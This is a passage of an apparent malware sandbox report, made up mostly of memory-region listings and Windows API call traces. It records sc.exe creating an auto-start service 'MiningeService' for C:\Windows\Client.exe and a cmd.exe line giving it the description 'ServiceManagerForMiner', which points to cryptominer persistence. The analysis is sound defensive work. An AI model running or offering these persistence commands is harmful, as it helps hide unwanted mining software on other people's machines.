0x76fe74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5998 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5999 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 6000 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 6001 start_va = 0x20000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 6002 start_va = 0xb0000 end_va = 0x116fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6003 start_va = 0x76c20000 end_va = 0x76cbffff monitored = 0 entry_point = 0x76c349e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 6004 start_va = 0x76cc0000 end_va = 0x76d6bfff monitored = 0 entry_point = 0x76cca472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 6005 start_va = 0x76900000 end_va = 0x76918fff monitored = 0 entry_point = 0x76904975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 6006 start_va = 0x75bc0000 end_va = 0x75caffff monitored = 0 entry_point = 0x75bd0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 6007 start_va = 0x75530000 end_va = 0x7558ffff monitored = 0 entry_point = 0x7554a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 6008 start_va = 0x75520000 end_va = 0x7552bfff monitored = 0 entry_point = 0x755210e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 6009 start_va = 0x290000 end_va = 0x30ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 6010 start_va = 0x360000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 6012 start_va = 0x30000 end_va = 0x3ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\sc.exe.mui") Thread: id = 232 os_tid = 0xa3c [0274.003] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28fde4 | out: lpSystemTimeAsFileTime=0x28fde4*(dwLowDateTime=0xca16e780, dwHighDateTime=0x1d7fb6e)) [0274.004] GetCurrentProcessId () returned 0xa38 [0274.004] GetCurrentThreadId () returned 0xa3c [0274.004] GetTickCount () returned 0x1d61807 [0274.004] QueryPerformanceCounter (in: lpPerformanceCount=0x28fddc | out: lpPerformanceCount=0x28fddc*=3100020881992) returned 1 [0274.004] GetModuleHandleA (lpModuleName=0x0) returned 0x600000 [0274.004] __set_app_type (_Type=0x1) [0274.004] __p__fmode () returned 0x76d631f4 [0274.004] __p__commode () returned 0x76d631fc [0274.004] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x6079c7) returned 0x0 [0274.005] __wgetmainargs (in: _Argc=0x609020, _Argv=0x609028, _Env=0x609024, _DoWildCard=0, _StartInfo=0x609034 | out: _Argc=0x609020, _Argv=0x609028, _Env=0x609024) returned 0 [0274.006] SetThreadUILanguage (LangId=0x0) returned 0x409 [0274.010] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0274.010] GetStdHandle (nStdHandle=0xfffffff5) returned 0x20c [0274.010] wcsncmp (_String1="cr", _String2="\\\\", _MaxCount=0x2) returned 7 [0274.010] _wcsicmp (_String1="create", _String2="query") returned -14 [0274.010] _wcsicmp (_String1="create", _String2="queryex") returned -14 [0274.010] _wcsicmp (_String1="create", _String2="start") returned -16 [0274.010] _wcsicmp (_String1="create", _String2="pause") returned -13 [0274.010] _wcsicmp (_String1="create", _String2="interrogate") returned -6 [0274.010] _wcsicmp (_String1="create", _String2="control") returned 3 [0274.010] _wcsicmp (_String1="create", _String2="continue") returned 3 [0274.010] _wcsicmp (_String1="create", _String2="stop") returned -16 [0274.010] _wcsicmp (_String1="create", _String2="config") returned 3 [0274.010] _wcsicmp (_String1="create", _String2="description") returned -1 [0274.010] _wcsicmp (_String1="create", _String2="failure") returned -3 [0274.010] _wcsicmp (_String1="create", _String2="privs") returned -13 [0274.010] _wcsicmp (_String1="create", _String2="failureflag") returned -3 [0274.010] _wcsicmp (_String1="create", _String2="triggerinfo") returned -17 [0274.010] _wcsicmp (_String1="create", _String2="sidtype") returned -16 [0274.010] _wcsicmp (_String1="create", _String2="preferrednode") returned -13 [0274.010] _wcsicmp (_String1="create", _String2="qc") returned -14 [0274.010] _wcsicmp (_String1="create", _String2="qdescription") returned -14 [0274.010] _wcsicmp (_String1="create", _String2="qfailure") returned -14 [0274.010] _wcsicmp (_String1="create", _String2="qprivs") returned -14 [0274.011] _wcsicmp (_String1="create", _String2="qfailureflag") returned -14 [0274.011] _wcsicmp (_String1="create", _String2="qtriggerinfo") returned -14 [0274.011] _wcsicmp (_String1="create", _String2="qsidtype") returned -14 [0274.011] _wcsicmp (_String1="create", _String2="showsid") returned -16 [0274.011] _wcsicmp (_String1="create", _String2="qpreferrednode") returned -14 [0274.011] _wcsicmp (_String1="create", _String2="querylock") returned -14 [0274.011] _wcsicmp (_String1="create", _String2="lock") returned -9 [0274.011] _wcsicmp (_String1="create", _String2="delete") returned -1 [0274.011] _wcsicmp (_String1="create", _String2="create") returned 0 [0274.011] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x2) returned 0x36f928 [0274.115] _wcsicmp (_String1="binpath=", _String2="type=") returned -18 [0274.115] _wcsicmp (_String1="binpath=", _String2="start=") returned -17 [0274.115] _wcsicmp (_String1="binpath=", _String2="error=") returned -3 [0274.115] _wcsicmp (_String1="binpath=", _String2="binPath=") returned 0 [0274.115] _wcsicmp (_String1="start=", _String2="type=") returned -1 [0274.115] _wcsicmp (_String1="start=", _String2="start=") returned 0 [0274.115] _wcsicmp (_String1="auto", _String2="boot") returned -1 [0274.115] _wcsicmp (_String1="auto", _String2="system") returned -18 [0274.115] _wcsicmp (_String1="auto", _String2="auto") returned 0 [0274.115] _wcsicmp (_String1="DisplayName=", _String2="type=") returned -16 [0274.115] _wcsicmp (_String1="DisplayName=", _String2="start=") returned -15 [0274.115] _wcsicmp (_String1="DisplayName=", _String2="error=") returned -1 [0274.115] _wcsicmp (_String1="DisplayName=", _String2="binPath=") returned 2 [0274.115] _wcsicmp (_String1="DisplayName=", _String2="group=") returned -3 [0274.115] _wcsicmp (_String1="DisplayName=", _String2="tag=") returned -16 [0274.115] _wcsicmp (_String1="DisplayName=", _String2="DisplayName=") returned 0 [0274.115] CreateServiceW (in: hSCManager=0x36f928, lpServiceName="MiningeService", lpDisplayName="MiningeService", dwDesiredAccess=0xf01ff, dwServiceType=0x10, dwStartType=0x2, dwErrorControl=0x1, lpBinaryPathName="C:\\Windows\\Client.exe", lpLoadOrderGroup=0x0, lpdwTagId=0x0, lpDependencies=0x0, lpServiceStartName=0x0, lpPassword=0x0 | out: lpdwTagId=0x0) returned 0x36f888 [0274.263] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x64, dwLanguageId=0x0, lpBuffer=0x28fcb0, nSize=0x2, Arguments=0x28fcbc | out: lpBuffer="㵸7ﴈ(䱓`ᰬ`༄0\x01") returned 0x1c [0274.267] GetFileType (hFile=0x20c) returned 0x3 [0274.267] LocalAlloc (uFlags=0x0, uBytes=0x38) returned 0x371d00 [0274.267] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="[SC] CreateService SUCCESS\r\n", cchWideChar=28, lpMultiByteStr=0x371d00, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[SC] CreateService SUCCESS\r\n", lpUsedDefaultChar=0x0) returned 28 [0274.267] WriteFile (in: hFile=0x20c, lpBuffer=0x371d00*, nNumberOfBytesToWrite=0x1c, lpNumberOfBytesWritten=0x28fca0, lpOverlapped=0x0 | out: lpBuffer=0x371d00*, lpNumberOfBytesWritten=0x28fca0*=0x1c, lpOverlapped=0x0) returned 1 [0274.268] LocalFree (hMem=0x371d00) returned 0x0 [0274.268] LocalFree (hMem=0x373d78) returned 0x0 [0274.268] CloseServiceHandle (hSCObject=0x36f888) returned 1 [0274.268] LocalFree (hMem=0x0) returned 0x0 [0274.268] CloseServiceHandle (hSCObject=0x36f928) returned 1 [0274.273] exit (_Code=0) Thread: id = 233 os_tid = 0xa44 Process: id = "29" image_name = "dllhost.exe" filename = "c:\\windows\\system32\\dllhost.exe" page_root = "0x6a3ba000" os_pid = "0xa48" os_integrity_level = "0x4000" os_privileges = "0xe60b7e890" monitor_reason = "rpc_server" parent_id = "4" os_parent_pid = "0x248" cmd_line = "C:\\Windows\\system32\\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000d101" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 6013 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6014 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 6015 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 6016 start_va = 0x40000 end_va = 0xa6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6017 start_va = 0xb0000 end_va = 0xb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 6018 start_va = 0xc0000 end_va = 0xc0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 6019 start_va = 0xd0000 end_va = 0xd0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 6020 start_va = 0x110000 end_va = 0x20ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 6021 start_va = 0x210000 end_va = 0x30ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 6022 start_va = 0x360000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 6023 start_va = 0x380000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 6024 start_va = 0x480000 end_va = 0x607fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 6025 start_va = 0x610000 end_va = 0x790fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6026 start_va = 0x7a0000 end_va = 0x85ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007a0000" filename = "" Region: id = 6027 start_va = 0x860000 end_va = 0x95ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 6028 start_va = 0x960000 end_va = 0xa5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000960000" filename = "" Region: id = 6029 start_va = 0xa70000 end_va = 0xb6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a70000" filename = "" Region: id = 6030 start_va = 0xb70000 end_va = 0xe3efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 6031 start_va = 0xe50000 end_va = 0xf4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e50000" filename = "" Region: id = 6032 start_va = 0xff0000 end_va = 0xffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ff0000" filename = "" Region: id = 6033 start_va = 0x1000000 end_va = 0x10fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001000000" filename = "" Region: id = 6034 start_va = 0x1130000 end_va = 0x122ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001130000" filename = "" Region: id = 6035 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 6036 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6037 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6038 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 6039 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 6040 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6041 start_va = 0xff210000 end_va = 0xff216fff monitored = 0 entry_point = 0xff21124c region_type = mapped_file name = "dllhost.exe" filename = "\\Windows\\System32\\dllhost.exe" (normalized: "c:\\windows\\system32\\dllhost.exe") Region: id = 6042 start_va = 0x7fef2610000 end_va = 0x7fef26affff monitored = 0 entry_point = 0x7fef268eb20 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_a4d6a923711520a9\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_a4d6a923711520a9\\comctl32.dll") Region: id = 6043 start_va = 0x7fefc220000 end_va = 0x7fefc243fff monitored = 0 entry_point = 0x7fefc221024 region_type = mapped_file name = "shacct.dll" filename = "\\Windows\\System32\\shacct.dll" (normalized: "c:\\windows\\system32\\shacct.dll") Region: id = 6044 start_va = 0x7fefcaf0000 end_va = 0x7fefcb0dfff monitored = 0 entry_point = 0x7fefcaf13b8 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 6045 start_va = 0x7fefcd40000 end_va = 0x7fefcd86fff monitored = 0 entry_point = 0x7fefcd41064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 6046 start_va = 0x7fefd040000 end_va = 0x7fefd057fff monitored = 0 entry_point = 0x7fefd043b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 6047 start_va = 0x7fefd640000 end_va = 0x7fefd64efff monitored = 0 entry_point = 0x7fefd641010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 6048 start_va = 0x7fefd730000 end_va = 0x7fefd743fff monitored = 0 entry_point = 0x7fefd7310e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 6049 start_va = 0x7fefd750000 end_va = 0x7fefd75efff monitored = 0 entry_point = 0x7fefd7519b0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 6050 start_va = 0x7fefd970000 end_va = 0x7fefd9dbfff monitored = 0 entry_point = 0x7fefd972780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 6051 start_va = 0x7fefdca0000 end_va = 0x7fefdd38fff monitored = 0 entry_point = 0x7fefdca1c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 6052 start_va = 0x7fefdd40000 end_va = 0x7fefde6cfff monitored = 0 entry_point = 0x7fefdd8ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 6053 start_va = 0x7fefde70000 end_va = 0x7fefded6fff monitored = 0 entry_point = 0x7fefde7b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 6054 start_va = 0x7fefec70000 end_va = 0x7fefed78fff monitored = 0 entry_point = 0x7fefec71064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 6055 start_va = 0x7fefef30000 end_va = 0x7fefefa0fff monitored = 0 entry_point = 0x7fefef41e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 6056 start_va = 0x7fefefb0000 end_va = 0x7feff08afff monitored = 0 entry_point = 0x7fefefd0760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 6057 start_va = 0x7feff090000 end_va = 0x7feff12efff monitored = 0 entry_point = 0x7feff0925a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 6058 start_va = 0x7feff140000 end_va = 0x7feff15efff monitored = 0 entry_point = 0x7feff1460e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 6059 start_va = 0x7feff1e0000 end_va = 0x7feff2b6fff monitored = 0 entry_point = 0x7feff1e3274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 6060 start_va = 0x7feff2c0000 end_va = 0x7feff2edfff monitored = 0 entry_point = 0x7feff2c1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 6061 start_va = 0x7feff2f0000 end_va = 0x7feff4f2fff monitored = 0 entry_point = 0x7feff313330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 6062 start_va = 0x7feff5a0000 end_va = 0x7feff5adfff monitored = 0 entry_point = 0x7feff5a1080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 6063 start_va = 0x7feff5b0000 end_va = 0x7feff678fff monitored = 0 entry_point = 0x7feff62a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 6064 start_va = 0x7feffb20000 end_va = 0x7feffb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 6065 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 6066 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 6067 start_va = 0x7fffffd5000 end_va = 0x7fffffd5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 6068 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 6069 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 6070 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 6071 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 6072 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 6106 start_va = 0x7fef98c0000 end_va = 0x7fef98d1fff monitored = 0 entry_point = 0x7fef98c101c region_type = mapped_file name = "idstore.dll" filename = "\\Windows\\System32\\IDStore.dll" (normalized: "c:\\windows\\system32\\idstore.dll") Thread: id = 234 os_tid = 0xa64 Thread: id = 235 os_tid = 0xa60 Thread: id = 236 os_tid = 0xa5c Thread: id = 237 os_tid = 0xa58 Thread: id = 238 os_tid = 0xa54 Thread: id = 239 os_tid = 0xa50 Thread: id = 240 os_tid = 0xa4c Process: id = "30" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x77b56000" os_pid = "0xa68" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "17" os_parent_pid = "0xc94" cmd_line = "C:\\Windows\\system32\\cmd.exe /C sc description MiningeService ServiceManagerForMiner" cur_dir = "C:\\Windows\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e771" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6076 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6077 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 6078 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 6079 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 6080 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 6081 start_va = 0xd0000 end_va = 0x10ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 6082 start_va = 0x250000 end_va = 0x34ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 6083 start_va = 0x4ab30000 end_va = 0x4ab7bfff monitored = 1 entry_point = 0x4ab3829a region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 6084 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6085 start_va = 0x779e0000 end_va = 0x77b5ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6086 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 6087 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 6088 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 6089 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 6090 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 6091 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6092 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6093 start_va = 0x170000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 6094 start_va = 0x75250000 end_va = 0x75257fff monitored = 0 entry_point = 0x752520f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 6095 start_va = 0x75260000 end_va = 0x752bbfff monitored = 0 entry_point = 0x7529f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6096 start_va = 0x752c0000 end_va = 0x752fefff monitored = 0 entry_point = 0x752ee088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6097 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6098 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6099 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = 